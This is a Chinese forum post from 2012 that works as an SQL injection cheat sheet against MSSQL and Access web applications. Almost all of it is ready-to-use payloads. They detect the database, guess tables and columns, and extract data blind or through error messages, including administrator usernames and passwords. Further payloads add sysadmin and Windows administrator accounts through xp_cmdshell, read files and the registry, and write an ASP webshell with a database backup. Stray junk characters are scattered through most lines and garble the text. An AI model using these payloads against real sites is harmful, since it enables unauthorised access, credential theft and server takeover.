1.判断是否有注入 ' \% h6 @( H6 s: r
;and 1=1 5 e7 w. [* q+ C5 O
;and 1=2
9 t/ y7 R8 v/ g% ?
3 w4 J0 h: F) I3 W5 K# b$ w. K' X/ C2.初步判断是否是mssql
: z" l$ i* W- Q( s! K! v3 ~;and user>0 # o+ |9 x F0 Q( }) [
" j+ t+ A1 E1 r2 Z2 A! x/ M3.判断数据库系统 * G. ]6 I* B3 Y; ^3 A+ J m6 @
;and (select count(*) from sysobjects)>0 mssql
) R7 W/ Y8 p. B P;and (select count(*) from msysobjects)>0 access
j) y% p& U$ \8 U' G ?, g0 A+ y, c& o8 g! E
4.注入参数是字符
9 e1 E# x0 _* r; w7 B( P8 b$ n3 c'and [查询条件] and ''='
; \+ Y' Y" i, p2 t6 f0 l
0 P& Z" N0 n G6 s' U# \5.搜索时没过滤参数的 - g2 E: e6 ? Y- b, t
'and [查询条件] and '%25'='
+ S' w& O: Y7 B9 `1 l6 T7 N2 o, L \( a2 d4 t$ @
6.猜数表名
* k9 d; b- P. c3 d;and (select Count(*) from [表名])>0
) `- i: M4 g2 M& {; d
2 [0 U. x+ b* ~: A7.猜字段
2 H6 ]! M y# h9 i2 t; `3 U;and (select Count(字段名) from 表名)>0 % b# S7 v3 {4 E2 A3 r4 f
, G7 J% Z7 c S* T
8.猜字段中记录长度
1 _2 Z# e$ O$ \% ^8 j7 h;and (select top 1 len(字段名) from 表名)>0
* j8 \4 u+ X8 O) S0 f* d. D5 _9 h4 l( B4 x+ m! @) d2 W5 z
9.(1)猜字段的ascii值(access) 8 \* j4 c3 G3 p& X3 u4 Z) e8 A
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
( N) }& G# M2 u R' U7 a [2 G2 n5 q' |0 E9 ?
(2)猜字段的ascii值(mssql) 0 [1 \( f+ T* X& O
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
& h5 G% A1 w1 j! q; T
9 i! j' [4 q) m10.测试权限结构(mssql)
2 y. p1 s: ]( E2 d* d;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- / b. |, W* `6 m+ y4 C- z
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
. \' Q B( I0 d2 ]* x X;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- & @7 k1 i+ W+ w" G
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
) M" X/ R1 B; i! Z* l;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ( U" u. c: R: _. B& x, {& V) Z" w
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 2 P* W6 N+ b2 ?* n, _, Y
;and 1=(select IS_MEMBER('db_owner'));--
- B# b+ @- [+ I: a
L+ g. A& |- p; L4 e* T11.添加mssql和系统的帐户 % ]; ~, `* S* p) J8 V' P
;exec master.dbo.sp_addlogin username;-- 8 `: r* P+ G( |' ]3 L9 s
;exec master.dbo.sp_password null,username,password;-- ; z% f8 k% u, w2 M% R! z
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ) Z+ _4 W5 |. g( o. R0 L
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
. E, [4 N7 Y9 w% ]9 L4 \3 ?;exec master.dbo.xp_cmdshell 'net user username password /add';-- + _$ v+ n" X# k/ v
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 3 P/ i5 x$ |/ |8 h; N
1 L1 k* ?9 D- {- j# \12.(1)遍历目录
. ^0 N$ J( g, w8 J% G;create table dirs(paths varchar(100), id int) 0 Q( k4 l& ^0 Q9 N0 C4 ]+ q3 G$ Y0 P
;insert dirs exec master.dbo.xp_dirtree 'c:\' " {1 d2 d5 j' C% A
;and (select top 1 paths from dirs)>0
; }& B& o1 D7 T. r$ h5 x( P;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
/ V1 K4 g0 z" T/ r1 M$ ~9 C
: a. ]" b; L* Y(2)遍历目录
/ C+ u) r% m% d- I9 W8 u. V;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
4 |4 r1 J" C- S;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
3 j s" X; j v( c;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
- Z" M' w$ {0 l# s- |4 b;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 ! d% \# @$ I# j" _. n; p
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
0 h0 O/ h- ~$ D. x9 H' F8 Z* t+ |) N, ? I9 A9 i, f
13.mssql中的存储过程
& C/ V0 L& v! R" X) Hxp_regenumvalues 注册表根键, 子键 + O: ^* V+ O& E! h2 t
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 6 |* ]7 h' N% x
xp_regread 根键,子键,键值名
C7 ~; f( q) v H! };exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 * d8 m9 t+ @9 ?; }
xp_regwrite 根键,子键, 值名, 值类型, 值
( a: Q- {! z6 K' p( Q2 l+ N值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
h8 T/ J) E7 q* N* S( s: y ];exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz','hello' 写入注册表
3 }/ h$ a9 |% I' J) Z1 w5 Vxp_regdeletevalue 根键,子键,值名
$ i$ n+ B3 h; ~* V. r% Uexec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' 删除某个值 7 H; Q) I, N8 Z
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 % L* ]4 K/ F' T+ H% d
$ E# F/ S- Q, J; g; v( X- Y: V
14.mssql的backup创建webshell
7 v2 \4 P; g: E, c4 I; Ause model 8 [ i" k* `5 a! }$ P
create table cmd(str image);
$ ?; W# y% y+ E" Pinsert into cmd(str) values ('<% Dim oScript %>');
. F2 s4 |0 E2 C+ Y* Zbackup database model to disk='c:\l.asp'; ! ^- l, D7 l& L# @! k
. T4 W' E6 |* w/ Z8 ?5 H: k$ k, ]6 }15.mssql内置函数
1 a# f6 \0 ~0 }, {) \( I: |. X;and (select @@version)>0 获得Windows的版本号
2 W* u. ~* }* B C. [;and user_name()='dbo' 判断当前系统的连接用户是不是sa
9 e3 B+ S( [. [) ?" ~ I0 z$ `;and (select user_name())>0 爆当前系统的连接用户
3 ^* I+ K; y- Z7 s+ q6 B8 x;and (select db_name())>0 得到当前连接的数据库 ~% R, j, D. L/ x' Y
$ ^9 s( k4 I4 n) Z$ u1 ~# R
2 X4 G- n: v! B
! K) @! }: \5 g$ k* v$ bMSSQL手注暴库
# { B, e1 @. W4 \
7 y: `; S0 w+ R+ ~1.暴出当前表名和列名
6 i+ G) k/ j7 I& G2 W/ U. ?9 S在注入点后提交“'having 1=1--",得到返回信息为英文,在这段英文中即可看到一个表名和一个列名。提交“group by 暴出的表名列名having 1=1--",可得到另一个列名;继续提交“group by 暴了的表名列名,暴出的表名.第2个列名 having 1=1--",可再得到一个列名。用同样的方法提交,直到页面不再返回错误信息,就可以得到所有的列名。小知识:暴表名与列名是在SQL语句中“having 1=1—"与GROUP BY结合使用,进行条件判断的。由于语句不完整,因此数据库返回错误信息,并显示一个表名和一个列名。基本方法只能暴出数据库中的当前表,如果某个表中包含的列名非常多,用上基本方法就非常困难了。
% V* C6 r. P! S5 J1 O( K. y) z
: J# r) T8 q6 f- H* r第一.爆出所有数据库名
1 j# w/ g4 } [ R利用“and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])"语句,暴出数据库中任意表名和列名,其中“[N]"表示数据库中的第N个表。7 B2 D0 B- R/ z4 f" H0 t% D; t$ ]
第一步:在注入点后提交如下语句:“and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=12)",因为 dbid 的值从1到5,是系统使用的,所以用户自己建的一定是从6开始的,并且我们提交了 name>1,name字段是一个字符型的字段,和数字比较会出错因此在提交后,IE会返回如下的信息:“Microsoft OLE DB Provider for ODBC Drivers 错误 ?e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Northwind' 转换为数据类型为 int 的列时发生语法错误。",这样就把name字段的值暴出来了,也就是我们得到了一个库名“Northwind"。改变“dbid"的值可以得出所有的库名。5 ^7 Q( C- ?: E
" b1 E: r) J# W2 }- B! yand 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])-- 修改N从6开始爆出所有数据库名. g# r) }4 l1 }' z; F5 v0 ]
! d9 ]; Y$ ~% c5 E4 F3 b
3 b0 r0 X. }* l# d* I, q第二.爆出指定库中的所有表名; t! J3 S! c0 C0 F4 |( s# J6 a
得到了库名后,现在要得到库中所有的表名,提交如下语句:"and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U') ",这里要暴的是master这个库中的表名,查询的SQL语句返回的是name的值,然后和数字0比较,这样就会暴露出name的值。提交后一个表名为“'spt_monito"就被暴出来了。
" p. X; E% h+ Q/ C6 Z再接着暴其他的表,继续提交如下语句:“and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U' and name not in('spt_monito'))"提交后,又暴出一个表名为"cd512"。依次提交"and name not in(' spt_monito',' cd512',..))"就可以查出所有的表名。
6 @# @$ [$ _/ `- [9 j2 ?
8 J2 N" l9 ?0 `' _" Eand 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U')--
* B% o8 M0 T' X, w9 X; Mand 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U' and name not in('[爆出的表名]'))-- U% P5 c7 E/ ^+ _
and 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U' and name not in('[爆出的表名]','[爆出的第二表名]'))--8 P$ m- m! r$ z% {
' l/ N, g6 t' o% O8 H$ H3 Z) D, x
4.爆出指定表中的所有列名) Q. K3 k+ q& l6 e K7 t2 l* l8 k
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
6 A( X8 F t+ \ M: R- z; k//把ID值转成字符型后再和一个整型值比较。ID号出来了。值为:949578421 name='表名'
7 y+ m4 X. }- d
) q% l6 N1 o5 {/ f5 O: s$ Dand 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421)-- 爆出admin表中的一个字段名* I. \ N3 d8 y! b
s; @ O: N' B5 L! i再提交and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421 and name not in('adduser'))-- ; H# c+ Q' p. \ n
依次提交"and name not in(' spt_monito',' cd512',..))"就可以查出admin表中的所有字段名。% o X& f6 i' I$ O/ w
4 S! ^( Q' S3 c7 F$ c% d, W7 J( V
; U6 B) k9 Q3 y- u" R1 a' L& tand 0<>(select count(*) from [指定库名].dbo.sysobjects where xtype='U' and name='[要爆字段的表名]' and uid>(str(id)))-- 爆出要爆字段的表名id值) g0 s) N" ~9 }' N
& P- n5 ]- x6 @$ O3 E- f/ w. a4 C% Wand 0<>(select top 1 name from [指定库名].dbo.syscolumns where id=爆出的id值)-- 爆出id值表中的一个字段名
! U$ Z- T- p: @" Q5 S* h0 l) |
: z0 D- Z" C# E1 ~and 0<>(select top 1 name from [指定库名].dbo.syscolumns where id=爆出的id值 and name not in('[爆出的字段名]'))-- ! \& K! n; q" b( @
# @9 u; n4 n2 g! c% f: a2 a+ s( y
! W" K/ I7 K2 v" z$ K5 T
; v, V; C$ H( G- f) a) b( y- u5.读取指定表中的数据
/ Y+ `: G5 [6 R v0 ~; w( ?. c+ K0 K1 y ^ I- T
and 0<(select A_ID from wutong.dbo.admin where A_UserID>1)-- 爆出A_PWD的内容 2 u; M& V6 G7 P* r- U' P3 \
: P. _) Q1 `! ~4 zand 0<(select [一个存在的字段] from [指定库名].dbo.[要查询的表名] where [要爆内容的字段名]>1)--
3 `; _8 |% w- L$ O0 [ `
0 P7 W" G/ d3 K3 B2 ~7 C# Q$ v- F! Oand 0<(select A_ID from wutong.dbo.admin where A_PWD>1 and A_UserID='admin')-- 爆出admin的密码" a$ M, u. K Z$ H. o
# W# G" v% ?# b* o: I! S
" d- ^6 m5 t8 Land 0<(Select Top 1 A_UserID FROM admin where A_ID<>1)-- 爆出id<>1的管理员名字(fuhao)/ f# w/ Y+ n+ e
- Z+ e6 d5 U0 G- A- K4 ~
and 0<(Select Top 1 A_UserID FROM admin where A_ID <>1 and A_UserID <> 'fuhao')-- 爆出第二个管理员的名字 <>不等于(tuiguang)
* t0 P( T+ z" m1 c: V k4 I+ V
( L6 t0 s8 r) W5 \and 0<(Select Top 1 A_UserID FROM admin where A_ID <>1 and A_UserID <> 'fuhao'and A_UserID <> 'tuiguang')--( p& {# k' S: i, l; v
( r+ ]) _) `' Q2 d, ^* R, S- a" l
知道了数据库的表名、列名后,可以利用“查询语句"读取数据库中的任意信息。例如要读取某个表中某列中的第N个数据,可提交语句:“and (Select Top 1 列名 FROM 表名 where id=[N])>1"( [N]代表列中的第N条数据),从IE返回信息中即可得知想要的数据。$ R* g7 u& t' }) G
|
发表于 2012-9-15 14:31:51
收藏
支持
反对